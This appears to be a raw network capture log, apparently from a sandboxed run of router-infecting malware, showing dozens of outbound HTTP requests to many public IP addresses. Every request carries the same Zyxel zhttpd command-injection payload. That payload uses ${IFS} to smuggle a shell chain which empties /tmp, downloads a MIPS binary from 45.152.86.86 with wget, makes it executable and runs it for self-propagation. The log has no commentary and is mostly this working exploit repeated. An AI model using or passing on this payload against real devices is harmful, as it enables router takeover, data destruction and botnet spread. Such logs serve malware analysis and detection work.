                                        Mar 31, 2024 09:21:54.296418905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6209192.168.2.2354764173.94.244.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296452999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6210192.168.2.2355032154.120.170.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296498060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6211192.168.2.2351958135.207.157.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296534061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6212192.168.2.235959023.189.10.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296576023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6213192.168.2.234861263.73.27.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296610117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6214192.168.2.2337678141.234.19.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296641111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6215192.168.2.233491052.132.102.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296689987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6216192.168.2.233525299.251.145.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296724081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6217192.168.2.2359836136.88.165.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296773911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6218192.168.2.234245293.34.231.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296801090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6219192.168.2.2360630203.0.55.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296834946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6220192.168.2.234709477.237.167.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296871901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6221192.168.2.23557448.14.246.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296899080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6222192.168.2.2360998197.43.248.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296941996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6223192.168.2.2349204149.83.133.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.296977043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6224192.168.2.233553825.97.210.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297024012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6225192.168.2.23458102.153.57.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297064066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6226192.168.2.2348308192.106.185.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297097921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6227192.168.2.2333448195.122.36.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297142029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6228192.168.2.2346602177.95.67.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297178984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6229192.168.2.2333884216.128.196.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297231913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6230192.168.2.234476217.142.210.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297269106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6231192.168.2.2359732121.250.72.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297308922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6232192.168.2.2359898161.227.243.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297352076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6233192.168.2.235370052.187.1.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297411919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6234192.168.2.235201840.99.61.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297465086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6235192.168.2.235895291.134.111.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297498941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6236192.168.2.2351714122.193.223.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297554016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6237192.168.2.2357448188.44.167.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297601938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6238192.168.2.235623457.102.174.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297657013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6239192.168.2.2342050171.193.114.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297705889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6240192.168.2.234812089.48.126.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297751904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6241192.168.2.233465484.204.75.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297786951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6242192.168.2.234528424.86.26.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297832012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6243192.168.2.234266483.202.88.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297878027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6244192.168.2.235520287.255.56.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297920942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6245192.168.2.2337956181.59.168.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297951937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6246192.168.2.2358258195.82.125.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.297993898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6247192.168.2.2340748138.72.157.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298036098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6248192.168.2.236025217.124.254.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298089027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6249192.168.2.2354142212.84.24.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298132896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6250192.168.2.2349596220.94.141.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298183918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6251192.168.2.2348958175.103.55.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298232079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6252192.168.2.2353732125.131.229.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298271894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6253192.168.2.2344848136.35.132.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298305988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6254192.168.2.233333691.65.27.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298362970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6255192.168.2.234744299.173.236.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298397064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6256192.168.2.2352054117.8.66.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298449039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6257192.168.2.2343460107.100.221.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298477888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6258192.168.2.23345424.127.105.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298517942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6259192.168.2.2335780135.180.225.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298559904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6260192.168.2.2333828107.77.196.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298594952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6261192.168.2.2352664138.155.161.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298645020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6262192.168.2.234065025.216.128.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298680067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6263192.168.2.2355084213.168.33.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298724890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6264192.168.2.2333236123.9.4.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298787117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6265192.168.2.234363475.133.51.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298831940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6266192.168.2.235035435.246.191.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298875093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6267192.168.2.2342832198.123.115.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298924923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6268192.168.2.2352106116.56.182.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.298978090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6269192.168.2.2353496174.214.205.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299015999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6270192.168.2.2355336139.200.9.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299066067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6271192.168.2.234355014.154.156.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299109936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6272192.168.2.233295864.242.242.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299149990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6273192.168.2.2347222179.87.57.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299197912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6274192.168.2.234533237.20.229.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299242020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6275192.168.2.235964427.187.212.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.299300909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6276192.168.2.233436253.90.165.133443
                                        TimestampBytes transferredDirectionData
